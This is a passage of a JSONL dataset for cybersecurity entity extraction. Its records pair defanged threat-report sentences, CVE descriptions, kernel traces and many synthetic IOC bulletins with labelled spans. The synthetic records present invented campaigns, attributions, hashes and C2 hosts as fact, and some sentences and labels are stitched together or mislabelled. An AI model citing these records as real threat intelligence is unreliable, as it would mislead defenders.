0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n <TASK>\n __create_synth_event+0x1e37/0x1eb0\n create_or_delete_synth_event+0x110/0x250\n synth_event_run_command+0x2f/0x110\n test_gen_synth_cmd+0x170/0x2eb [synth_event_gen_test]\n synth_event_gen_test_init+0x76/0x9bc [synth_event_gen_test]\n do_one_initcall+0xdb/0x480\n do_init_module+0x1cf/0x680\n load_module+0x6a50/0x70a0\n __do_sys_finit_module+0x12f/0x1c0\n do_syscall_64+0x3f/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd", "spans": {"Indicator: rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org": [[1133, 1193]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1088, 1092]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-49799"}}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst[ . ]exe” utility to register a custom shim database file containing a patch onto a system .", "spans": {"Organization: Dragos": [[0, 6]], "Organization: oil": [[186, 189]], "Organization: gas industries": [[194, 208]], "Malware: PowerShell script": [[311, 328]], "Indicator: sdbinst.exe”": [[345, 361]]}, "info": {"id": "cyberner_stix_train_000413", "source": "defanged_augment"}}
{"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : hxxp://nicoledotson[.]icu/debby/weatherford/Ekspertyza . Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": {"Organization: Dragos": [[43, 49]], "Indicator: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[290, 344]]}, "info": {"id": "cyberner_stix_train_002430", "source": "defanged_augment"}}
{"text": "IOC Bulletin - AgentTesla Campaign:\nNetwork Indicators:\n- 45 [ . ] 203 [ . ] 126 [ . ] 98\n- 218[.]118[.]255[.]116\n- 172[.]13[.]101[.]75\n- storagesync[.]tech\n- gatewaygateway[.]com\nURLs:\n- hxxp://api-api[ . ]cc/admin/config\n- hxxp://login-proxy[ . ]link/wp-content/uploads/doc.php\nEmail Senders:\n- account@identity-verify[.]cc\n- notification@credential-check[ . ]site\nFile Indicators:\n- SHA256: 61e1ff2aeb28548fde8a079bc97f5483dd9243103ca7addb478bdf795801c94e\n- SHA256: 6b95cf9e398686c1bca42fd67e6e77fb07e704bb1d0947f54381bc5b1db628d4\n- Drop path: /usr/local/bin/payload.bin", "spans": {"Malware: AgentTesla": [[15, 25]], "Indicator: 45.203.126.98": [[58, 89]], "Indicator: 218.118.255.116": [[92, 113]], "Indicator: 172.13.101.75": [[116, 135]], "Indicator: storagesync.tech": [[138, 156]], "Indicator: gatewaygateway.com": [[159, 179]], "Indicator: http://api-api.cc/admin/config": [[188, 222]], "Indicator: hxxp://login-proxy.link/wp-content/uploads/doc.php": [[225, 279]], "Indicator: account@identity-verify.cc": [[297, 325]], "Indicator: notification@credential-check.site": [[328, 366]], "Indicator: 61e1ff2aeb28548fde8a079bc97f5483dd9243103ca7addb478bdf795801c94e": [[394, 458]], "Indicator: 6b95cf9e398686c1bca42fd67e6e77fb07e704bb1d0947f54381bc5b1db628d4": [[469, 533]]}, "info": {"id": "synth_v2_01306", "source": "defanged_augment"}}
{"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit[ . ]MSWord[ . ]CVE-2010-333 , Exploit[ . ]Win32[ . ]CVE-2012-0158 .", "spans": {"Organization: IT service": [[70, 80]], "Organization: (MSPs)": [[91, 97]], "Organization: Kaspersky Lab": [[177, 190]], "Organization: Microsoft Office": [[214, 230]], "Vulnerability: exploits": [[231, 239]], "Indicator: Exploit.MSWord.CVE-2010-333": [[287, 322]], "Indicator: Exploit.Win32.CVE-2012-0158": [[325, 360]]}, "info": {"id": "cyberner_stix_train_002989", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Lumma Stealer Campaign:\nNetwork Indicators:\n- 172 [ . ] 240 [ . ] 215 [ . ] 150\n- 10 [ . ] 104 [ . ] 252 [ . ] 248\n- 155 [ . ] 126 [ . ] 1 [ . ] 24\n- secure-update[ . ]net\n- cloudauth[.]io\nURLs:\n- hxxps://update-login[ . ]xyz/secure/token\n- hxxp://cloud-api[.]dev/wp-content/uploads/doc.php\nEmail Senders:\n- service@login-portal[ . ]tech\n- info@mail-service[.]info\nFile Indicators:\n- MD5: 40e0d120d6e188c5c0d9ea83a23b5e6a\n- SHA256: 2c9d196410573193e1d369fc6ed96f2b9fcc512066a63ffac0e293df05becce1\n- Drop path: C:\\Windows\\Temp\\shell.php", "spans": {"Malware: Lumma Stealer": [[15, 28]], "Indicator: 172.240.215.150": [[61, 94]], "Indicator: 10.104.252.248": [[97, 129]], "Indicator: 155.126.1.24": [[132, 162]], "Indicator: secure-update.net": [[165, 186]], "Indicator: cloudauth.io": [[189, 203]], "Indicator: hxxps://update-login.xyz/secure/token": [[212, 253]], "Indicator: hxxp://cloud-api.dev/wp-content/uploads/doc.php": [[256, 305]], "Indicator: service@login-portal.tech": [[323, 352]], "Indicator: info@mail-service.info": [[355, 379]], "Indicator: 40e0d120d6e188c5c0d9ea83a23b5e6a": [[404, 436]], "Indicator: 2c9d196410573193e1d369fc6ed96f2b9fcc512066a63ffac0e293df05becce1": [[447, 511]]}, "info": {"id": "synth_v2_01435", "source": "defanged_augment"}}
{"text": "A vulnerability was found in FreePBX cdr 14.0. It has been classified as critical. This affects the function ajaxHandler of the file ucp/Cdr.class.php. The manipulation of the argument limit/offset leads to sql injection. Upgrading to version 14[.]0[.]5[.]21 is able to address this issue. The name of the patch is f1a9eea2dfff30fb99d825bac194a676a82b9ec8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216771.", "spans": {"Indicator: 14.0.5.21": [[243, 258]], "Indicator: f1a9eea2dfff30fb99d825bac194a676a82b9ec8": [[315, 355]], "Vulnerability: sql injection": [[207, 220]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-36630"}}
{"text": "com.schwab.mobile com[ . ]americanexpress[ . ]android[ . ]acctsvcs[ . ]us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661", "spans": {"Indicator: com.americanexpress.android.acctsvcs.us": [[18, 73]]}, "info": {"id": "cyner_train_001055", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-45005 is a critical race condition affecting Citrix NetScaler. CrowdStrike confirmed active exploitation by Star Blizzard in the wild. Exploitation delivers DanaBot (SHA1: 8694a04b8d7eaf0d405abd673d69d9878663e9cd) which is dropped to /etc/cron.d/payload.bin. The exploit payload is hosted at hxxp://apiupdate[ . ]link/assets/js/payload.js and communicates to 192 [ . ] 187 [ . ] 179 [ . ] 185 for C2.", "spans": {"Vulnerability: CVE-2023-45005": [[24, 38]], "Vulnerability: race condition": [[53, 67]], "System: Citrix NetScaler": [[78, 94]], "Organization: CrowdStrike": [[96, 107]], "Malware: DanaBot": [[190, 197]], "Indicator: 8694a04b8d7eaf0d405abd673d69d9878663e9cd": [[205, 245]], "Indicator: hxxp://apiupdate.link/assets/js/payload.js": [[325, 371]], "Indicator: 192.187.179.185": [[392, 425]]}, "info": {"id": "synth_v2_00721", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192 [ . ] 201 [ . ] 49 [ . ] 34, the Qualys IR team identified Gootloader running as /tmp/runtime.dll. The threat actor, believed to be TA505, used WinPEAS for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to cache-login[ . ]online and backuplogin[.]xyz. The initial dropper (SHA1: 0af9b1abe80840147ff14976086c1212b741c87d) was delivered via a phishing email from notification@secure-verify[ . ]net. A second C2 node was observed at 193 [ . ] 27 [ . ] 155 [ . ] 118, with a persistence mechanism writing to C:\\Windows\\Temp\\csrss.exe.", "spans": {"Indicator: 192.201.49.34": [[64, 95]], "Organization: Qualys": [[101, 107]], "Malware: Gootloader": [[127, 137]], "Indicator: cache-login.online": [[308, 330]], "Indicator: backuplogin.xyz": [[335, 352]], "Indicator: 0af9b1abe80840147ff14976086c1212b741c87d": [[381, 421]], "Indicator: notification@secure-verify.net": [[463, 497]], "Indicator: 193.27.155.118": [[532, 564]]}, "info": {"id": "synth_v2_00335", "source": "defanged_augment"}}
{"text": "Artifact Analysis for TrickBot campaign:\nStage 1 dropper at /etc/cron.d/chrome_helper.exe - SHA1: b5beb5635baa396e227fd79331fd3442ad70105b\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so - SHA1: 281eaefeabb72cf07ab45c7c6af14e11c6e31fd5\nFinal payload at C:\\ProgramData\\update.dll - SHA256: 0a54faf272ad58bf7b7ace7a3b8de248c3a3bfb75c715bbced6b4520a4ba0f0a\nExfiltration module - SHA256: 24df310619e615c0b8148ee3070511cdce287633d9ce73863bf64fa608d2fe7b\nAll stages communicated with 76 [ . ] 113 [ . ] 7 [ . ] 10. Sharphound signatures detected in Stage 2.", "spans": {"Malware: TrickBot": [[22, 30]], "Indicator: b5beb5635baa396e227fd79331fd3442ad70105b": [[98, 138]], "Indicator: 281eaefeabb72cf07ab45c7c6af14e11c6e31fd5": [[210, 250]], "Indicator: 0a54faf272ad58bf7b7ace7a3b8de248c3a3bfb75c715bbced6b4520a4ba0f0a": [[304, 368]], "Indicator: 24df310619e615c0b8148ee3070511cdce287633d9ce73863bf64fa608d2fe7b": [[399, 463]], "Indicator: 76.113.7.10": [[493, 522]]}, "info": {"id": "synth_v2_01985", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-20659 is a critical SSRF vulnerability affecting Cisco ASA. Dragos confirmed active exploitation by FIN11 in the wild. Exploitation delivers Vidar (SHA256: 106cb5dfcca5dac7fe2ab9d0d9db6ecdc3d9bfa6d56f008104f6f88bf7370f9d) which is dropped to C:\\Program Files\\Common Files\\ntds.dit. The exploit payload is hosted at hxxps://login-proxy[.]com/login and communicates to 10[.]180[.]32[.]135 for C2.", "spans": {"Vulnerability: CVE-2023-20659": [[24, 38]], "Vulnerability: SSRF vulnerability": [[53, 71]], "System: Cisco ASA": [[82, 91]], "Organization: Dragos": [[93, 99]], "Malware: Vidar": [[174, 179]], "Indicator: 106cb5dfcca5dac7fe2ab9d0d9db6ecdc3d9bfa6d56f008104f6f88bf7370f9d": [[189, 253]], "Indicator: hxxps://login-proxy.com/login": [[348, 379]], "Indicator: 10.180.32.135": [[400, 419]]}, "info": {"id": "synth_v2_00731", "source": "defanged_augment"}}
{"text": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3 [ . ] 2 [ . ] 18 [ . ] 2, D6220 before 1 [ . ] 0 [ . ] 0 [ . ] 68, D6400 before 1 [ . ] 0 [ . ] 0 [ . ] 102, D8500 before 1[.]0[.]3[.]60, LAX20 before 1[.]1[.]6[.]28, MK62 before 1[.]0[.]6[.]116, MR60 before 1 [ . ] 0 [ . ] 6 [ . ] 116, MS60 before 1[.]0[.]6[.]116, R6300v2 before 1 [ . ] 0 [ . ] 4 [ . ] 50, R6400 before 1 [ . ] 0 [ . ] 1 [ . ] 68, R6400v2 before 1 [ . ] 0 [ . ] 4 [ . ] 118, R6700v3 before 1 [ . ] 0 [ . ] 4 [ . ] 118, R6900P before 1 [ . ] 3 [ . ] 3 [ . ] 140, R7000 before 1 [ . ] 0 [ . ] 11 [ . ] 116, R7000P before 1 [ . ] 3 [ . ] 3 [ . ] 140, R7850 before 1 [ . ] 0 [ . ] 5 [ . ] 68, R7900 before 1 [ . ] 0 [ . ] 4 [ . ] 38, R7900P before 1 [ . ] 4 [ . ] 2 [ . ] 84, R7960P before 1[.]4[.]2[.]84, R8000 before 1[.]0[.]4[.]68, R8000P before 1[.]4[.]2[.]84, RAX15 before 1[.]0[.]3[.]96, RAX20 before 1[.]0[.]3[.]96, RAX200 before 1 [ . ] 0 [ . ] 4 [ . ] 120, RAX35v2 before 1[.]0[.]3[.]96, RAX40v2 before 1[.]0[.]3[.]96, RAX43 before 1[.]0[.]3[.]96, RAX45 before 1 [ . ] 0 [ . ] 3 [ . ] 96, RAX50 before 1[.]0[.]3[.]96, RAX75 before 1[.]0[.]4[.]120, RAX80 before 1[.]0[.]4[.]120, RBK752 before 3 [ . ] 2 [ . ] 17 [ . ] 12, RBK852 before 3[.]2[.]17[.]12, RBR750 before 3[.]2[.]17[.]12, RBR850 before 3 [ . ] 2 [ . ] 17 [ . ] 12, RBS750 before 3[.]2[.]17[.]12, RBS850 before 3[.]2[.]17[.]12, RS400 before 1 [ . ] 5 [ . ] 1 [ . ] 80, and XR1000 before 1[.]0[.]0[.]58.", "spans": {"Indicator: 3.2.18.2": [[123, 149]], "Indicator: 1.0.0.68": [[164, 190]], "Indicator: 1.0.0.102": [[205, 232]], "Indicator: 1.0.3.60": [[247, 261]], "Indicator: 1.1.6.28": [[276, 290]], "Indicator: 1.0.6.116": [[304, 319], [333, 360], [374, 389]], "Indicator: 1.0.4.50": [[406, 432]], "Indicator: 1.0.1.68": [[447, 473]], "Indicator: 1.0.4.118": [[490, 517], [534, 561]], "Indicator: 1.3.3.140": [[577, 604], [663, 690]], "Indicator: 1.0.11.116": [[619, 647]], "Indicator: 1.0.5.68": [[705, 731]], "Indicator: 1.0.4.38": [[746, 772]], "Indicator: 1.4.2.84": [[788, 814], [830, 844], [889, 903]], "Indicator: 1.0.4.68": [[859, 873]], "Indicator: 1.0.3.96": [[918, 932], [947, 961], [1021, 1035], [1052, 1066], [1081, 1095], [1110, 1136], [1151, 1165]], "Indicator: 1.0.4.120": [[977, 1004], [1180, 1195], [1210, 1225]], "Indicator: 3.2.17.12": [[1241, 1268], [1284, 1299], [1315, 1330], [1346, 1373], [1389, 1404], [1420, 1435]], "Indicator: 1.5.1.80": [[1450, 1476]], "Indicator: 1.0.0.58": [[1496, 1510]], "Vulnerability: stack-based buffer overflow": [[42, 69]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-45604"}}
{"text": "DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Affected versions are subject to a privilege escalation vulnerability. A DHIS2 user with authority to manage users can assign superuser privileges to themself by manually crafting an HTTP PUT request. Only users with the following DHIS2 user role authorities can exploit this vulnerability. Note that in many systems the only users with user admin privileges are also superusers. In these cases, the escalation vulnerability does not exist. The vulnerability is only exploitable by attackers who can authenticate as users with the user admin authority.  As this is usually a small and relatively trusted set of users, exploit vectors will often be limited. DHIS2 administrators should upgrade to the following hotfix releases: 2[.]36[.]12[.]1, 2 [ . ] 37 [ . ] 8 [ . ] 1, 2 [ . ] 38 [ . ] 2 [ . ] 1, 2[.]39[.]0[.]1. The only known workaround to this issue is to avoid the assignment of the user management authority to any users until the patch has been applied.", "spans": {"Indicator: 2.36.12.1": [[842, 857]], "Indicator: 2.37.8.1": [[859, 885]], "Indicator: 2.38.2.1": [[887, 913]], "Indicator: 2.39.0.1": [[915, 929]], "Vulnerability: privilege escalation": [[150, 170]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-41948"}}
{"text": "A backdoor also known as: W32.OnGamesGNOLAH.Trojan Worm.Win32.VB!O Trojan.Jinra.A3 Worm.VB.Win32.2511 W32/VB.bem Win32[.]Worm[.]VB[.]kz W32.SillyFDC Win32/SillyAutorun.CKX WORM_VB.JSE Worm.Win32.VB.bem Trojan.Win32.VB.csfhed W32.W.VB.tnRc Win32.Worm.Vb.Szvd WORM_VB.JSE Worm/VB.pbz Worm/Win32.VB Worm:Win32/Jinra.A Trojan.Symmi.D5113 Worm.Win32.A.VB.184320 Worm.Win32.VB.bem Worm/Win32.VB.R125768 Trojan.VBRA.010736 Worm.Email Win32/VB.NUR Worm.VB!cXQoycDN5vU Worm.Win32.AutoRun", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Win32.Worm.VB.kz": [[113, 135]]}, "info": {"id": "cyner2_train_003964", "source": "defanged_augment"}}
{"text": "This mimics the wallet updater connected to the C2 addresses : wfcwallet[ . ]com ( resolved ip : 108 [ . ] 174 [ . ] 195 [ . ] 134 ) , www[.]chainfun365[.]com ( resolved ip : 23[.]254[.]217[.]53 ) .", "spans": {"Indicator: wfcwallet.com": [[63, 80]], "Indicator: 108.174.195.134": [[97, 130]], "Indicator: www.chainfun365.com": [[135, 158]], "Indicator: 23.254.217.53": [[175, 194]]}, "info": {"id": "cyberner_stix_train_007089", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NSA identified a large-scale phishing operation. Emails originated from finance@document-share[.]link and notification@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxps://gateway-backup[.]com/callback which hosted a credential harvesting page on datasync[ . ]io. A secondary link hxxp://portal-static[ . ]club/wp-content/uploads/doc.php delivered SystemBC (MD5: b767b2e84d8ece2f6d0342b75ed0e898). The malware was saved to /usr/local/bin/sam.hive and established C2 with 192 [ . ] 80 [ . ] 60 [ . ] 58.", "spans": {"Organization: NSA": [[26, 29]], "Indicator: finance@document-share.link": [[98, 127]], "Indicator: notification@account-update.xyz": [[132, 165]], "Indicator: hxxps://gateway-backup.com/callback": [[222, 259]], "Indicator: datasync.io": [[305, 320]], "Indicator: hxxp://portal-static.club/wp-content/uploads/doc.php": [[339, 395]], "Malware: SystemBC": [[406, 414]], "Indicator: b767b2e84d8ece2f6d0342b75ed0e898": [[421, 453]], "Indicator: 192.80.60.58": [[529, 559]]}, "info": {"id": "synth_v2_00911", "source": "defanged_augment"}}
{"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd[ . ]txt file to c[ . ]aspx in three different SharePoint related folders .", "spans": {"Indicator: cmd.txt": [[99, 110]], "Indicator: c.aspx": [[119, 129]]}, "info": {"id": "cyberner_stix_train_005023", "source": "defanged_augment"}}
{"text": "Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata.\n\n\nYou are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of \"data\" or \"tar\". See the tarfile  extraction filters documentation hxxps://docs[ . ]python[ . ]org/3/library/tarfile.html#tarfile-extraction-filter  for more information.\n\nNote that for Python 3.14 or later the default value of filter= changed from \"no filtering\" to `\"data\", so if you are relying on this new default behavior then your usage is also affected.\n\nNote that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.", "spans": {"Indicator: https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter": [[419, 499]], "System: Python": [[538, 544]], "Vulnerability: code execution": [[887, 901]], "Vulnerability: symlink": [[53, 60]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-4138"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Correct the migration DMA map direction\n\nThe SVM DMA device map direction should be set the same as\nthe DMA unmap setting, otherwise the DMA core will report\nthe following warning.\n\nBefore finialize this solution, there're some discussion on\nthe DMA mapping type(stream-based or coherent) in this KFD\nmigration case, followed by hxxps://lore[.]kernel[.]org/all/04d4ab32\n-45a1-4b88-86ee-fb0f35a0ca40@amd[.]com/T/.\n\nAs there's no dma_sync_single_for_*() in the DMA buffer accessed\nthat because this migration operation should be sync properly and\nautomatically. Give that there's might not be a performance problem\nin various cache sync policy of DMA sync. Therefore, in order to\nsimplify the DMA direction setting alignment, let's set the DMA map\ndirection as BIDIRECTIONAL.\n\n[  150.834218] WARNING: CPU: 8 PID: 1812 at kernel/dma/debug.c:1028 check_unmap+0x1cc/0x930\n[  150.834225] Modules linked in: amdgpu(OE) amdxcp drm_exec(OE) gpu_sched drm_buddy(OE) drm_ttm_helper(OE) ttm(OE) drm_suballoc_helper(OE) drm_display_helper(OE) drm_kms_helper(OE) i2c_algo_bit rpcsec_gss_krb5 auth_rpcgss nfsv4 nfs lockd grace netfs xt_conntrack xt_MASQUERADE nf_conntrack_netlink xfrm_user xfrm_algo iptable_nat xt_addrtype iptable_filter br_netfilter nvme_fabrics overlay nfnetlink_cttimeout nfnetlink openvswitch nsh nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bridge stp llc sch_fq_codel intel_rapl_msr amd_atl intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_scodec_component snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg edac_mce_amd snd_pci_acp6x snd_hda_codec snd_acp_config snd_hda_core snd_hwdep snd_soc_acpi kvm_amd sunrpc snd_pcm kvm binfmt_misc snd_seq_midi crct10dif_pclmul snd_seq_midi_event ghash_clmulni_intel sha512_ssse3 snd_rawmidi nls_iso8859_1 sha256_ssse3 sha1_ssse3 snd_seq aesni_intel snd_seq_device crypto_simd snd_timer cryptd input_leds\n[  150.834310]  wmi_bmof serio_raw k10temp rapl snd sp5100_tco ipmi_devintf soundcore ccp ipmi_msghandler cm32181 industrialio mac_hid msr parport_pc ppdev lp parport efi_pstore drm(OE) ip_tables x_tables pci_stub crc32_pclmul nvme ahci libahci i2c_piix4 r8169 nvme_core i2c_designware_pci realtek i2c_ccgx_ucsi video wmi hid_generic cdc_ether usbnet usbhid hid r8152 mii\n[  150.834354] CPU: 8 PID: 1812 Comm: rocrtst64 Tainted: G           OE      6.10.0-custom #492\n[  150.834358] Hardware name: AMD Majolica-RN/Majolica-RN, BIOS RMJ1009A 06/13/2021\n[  150.834360] RIP: 0010:check_unmap+0x1cc/0x930\n[  150.834363] Code: c0 4c 89 4d c8 e8 34 bf 86 00 4c 8b 4d c8 4c 8b 45 c0 48 8b 4d b8 48 89 c6 41 57 4c 89 ea 48 c7 c7 80 49 b4 84 e8 b4 81 f3 ff <0f> 0b 48 c7 c7 04 83 ac 84 e8 76 ba fc ff 41 8b 76 4c 49 8d 7e 50\n[  150.834365] RSP: 0018:ffffaac5023739e0 EFLAGS: 00010086\n[  150.834368] RAX: 0000000000000000 RBX: ffffffff8566a2e0 RCX: 0000000000000027\n[  150.834370] RDX: ffff8f6a8f621688 RSI: 0000000000000001 RDI: ffff8f6a8f621680\n[  150.834372] RBP: ffffaac502373a30 R08: 00000000000000c9 R09: ffffaac502373850\n[  150.834373] R10: ffffaac502373848 R11: ffffffff84f46328 R12: ffffaac502373a40\n[  150.834375] R13: ffff8f6741045330 R14: ffff8f6741a77700 R15: ffffffff84ac831b\n[  150.834377] FS:  00007faf0fc94c00(0000) GS:ffff8f6a8f600000(0000) knlGS:0000000000000000\n[  150.834379] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  150.834381] CR2: 00007faf0b600020 CR3: 000000010a52e000 CR4: 0000000000350ef0\n[  150.834383] Call Trace:\n[  150.834385]  <TASK>\n[  150.834387]  ? show_regs+0x6d/0x80\n[  150.834393]  ? __warn+0x8c/0x140\n[  150.834397]  ? check_unmap+0x1cc/0x930\n[  150.834400]  ? report_bug+0x193/0x1a0\n[  150.834406]  ? handle_bug+0x46/0x80\n[  150.834410]  ? exc_invalid_op+0x1d/0x80\n[  150.834413]  ? asm_exc_invalid_op+0x1f/0x30\n[  150.834420]  ? check_unmap+0x1cc/0x930\n[  150.834425]  debug_dma_unmap_page+0x86/0x90\n[  150.834431]  ? srso_return_thunk+0x5/0x5f\n[  150.834435] \n---truncated---", "spans": {"Indicator: https://lore.kernel.org/all/04d4ab32": [[410, 450]], "Indicator: amd.com": [[480, 489]], "System: Linux kernel": [[7, 19]], "Organization: AMD": [[2483, 2486]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-57897"}}
{"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 67 [ . ] 110 [ . ] 105 [ . ] 51\n- 172 [ . ] 184 [ . ] 220 [ . ] 146\n- 192 [ . ] 18 [ . ] 205 [ . ] 103\n- cdnsync[ . ]io\n- dataauth[ . ]org\nURLs:\n- hxxps://cloudstorage[.]io/collect\n- hxxps://auth-node[.]top/callback\nEmail Senders:\n- it@secure-verify[ . ]net\n- noreply@mail-service[ . ]info\nFile Indicators:\n- SHA256: 59e17639660c398276ebd6ee77804edf590f8a660040f317e59c60c3fbcf11ef\n- MD5: fff831dae3141dbd277bb4025a12a6e8\n- Drop path: C:\\Users\\admin\\Downloads\\taskhost.exe", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 67.110.105.51": [[56, 87]], "Indicator: 172.184.220.146": [[90, 123]], "Indicator: 192.18.205.103": [[126, 158]], "Indicator: cdnsync.io": [[161, 175]], "Indicator: dataauth.org": [[178, 194]], "Indicator: https://cloudstorage.io/collect": [[203, 236]], "Indicator: https://auth-node.top/callback": [[239, 271]], "Indicator: it@secure-verify.net": [[289, 313]], "Indicator: noreply@mail-service.info": [[316, 345]], "Indicator: 59e17639660c398276ebd6ee77804edf590f8a660040f317e59c60c3fbcf11ef": [[373, 437]], "Indicator: fff831dae3141dbd277bb4025a12a6e8": [[445, 477]]}, "info": {"id": "synth_v2_01340", "source": "defanged_augment"}}
{"text": "A phishing campaign impersonating Foxit Software delivers UltraVNC remote access payloads targeting users in the United States, Germany, Ukraine, and the United Kingdom. The malicious installer (MD5: a3b7c9d2e1f456789012345678abcdef) was distributed via email from noreply@foxit-update[ . ]download[ . ]com. The UltraVNC payload connects back to vnc-relay[ . ]threatinfra[ . ]net:5900 for remote desktop access.", "spans": {"Malware: UltraVNC": [[58, 66], [312, 320]], "Organization: Foxit Software": [[34, 48]], "Indicator: a3b7c9d2e1f456789012345678abcdef": [[200, 232]], "Indicator: noreply@foxit-update.download.com": [[265, 306]], "Indicator: vnc-relay.threatinfra.net": [[346, 379]]}, "info": {"id": "otx_00022", "source": "defanged_augment"}}
{"text": "IOC Bulletin - PikaBot Campaign:\nNetwork Indicators:\n- 47 [ . ] 111 [ . ] 99 [ . ] 94\n- 9[.]145[.]141[.]69\n- 93 [ . ] 60 [ . ] 156 [ . ] 53\n- backuplogin[.]net\n- auth-relay[.]tech\nURLs:\n- hxxp://backupcache[.]tech/admin/config\n- hxxps://secureapi[ . ]top/download/update.exe\nEmail Senders:\n- finance@identity-verify[ . ]cc\n- helpdesk@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 7340e50df65a8e311be839b32ccad3ce\n- SHA1: cda5963b28aecea57a6ead9900f3590cb44505b8\n- Drop path: C:\\Users\\Public\\Documents\\csrss.exe", "spans": {"Malware: PikaBot": [[15, 22]], "Indicator: 47.111.99.94": [[55, 85]], "Indicator: 9.145.141.69": [[88, 106]], "Indicator: 93.60.156.53": [[109, 139]], "Indicator: backuplogin.net": [[142, 159]], "Indicator: auth-relay.tech": [[162, 179]], "Indicator: http://backupcache.tech/admin/config": [[188, 226]], "Indicator: https://secureapi.top/download/update.exe": [[229, 274]], "Indicator: finance@identity-verify.cc": [[292, 322]], "Indicator: helpdesk@urgent-notice.online": [[325, 358]], "Indicator: 7340e50df65a8e311be839b32ccad3ce": [[383, 415]], "Indicator: cda5963b28aecea57a6ead9900f3590cb44505b8": [[424, 464]]}, "info": {"id": "synth_v2_01446", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Meduza Stealer campaign:\nStage 1 dropper at C:\\Users\\admin\\Desktop\\payload.bin - SHA1: 93340b9f1e731f93ed5a9cb5f5152f8e364dfb95\nStage 2 loader at /tmp/chrome_helper.exe - SHA1: 37778ccf5b641ba4cfdb0ca5ee3fde52c7e46cf8\nFinal payload at /etc/cron.d/helper.sh - SHA256: 49347bcb845b29752879daf1f5526e2b7395e63e9caadea3544e9a4fe4125c73\nExfiltration module - SHA1: f5d7e7f6f12c13fd250ae24b48c055ae9300fc44\nAll stages communicated with 192[.]37[.]57[.]92. Nmap signatures detected in Stage 2.", "spans": {"Malware: Meduza Stealer": [[22, 36]], "Indicator: 93340b9f1e731f93ed5a9cb5f5152f8e364dfb95": [[109, 149]], "Indicator: 37778ccf5b641ba4cfdb0ca5ee3fde52c7e46cf8": [[199, 239]], "Indicator: 49347bcb845b29752879daf1f5526e2b7395e63e9caadea3544e9a4fe4125c73": [[289, 353]], "Indicator: f5d7e7f6f12c13fd250ae24b48c055ae9300fc44": [[382, 422]], "Indicator: 192.37.57.92": [[452, 470]]}, "info": {"id": "synth_v2_01983", "source": "defanged_augment"}}
{"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword[ . ]exe .", "spans": {"Vulnerability: CVE-2012-0158": [[23, 36]], "Indicator: Mimikatz Lite": [[227, 240]], "Indicator: GetPassword.exe": [[244, 263]]}, "info": {"id": "cyberner_stix_train_004029", "source": "defanged_augment"}}
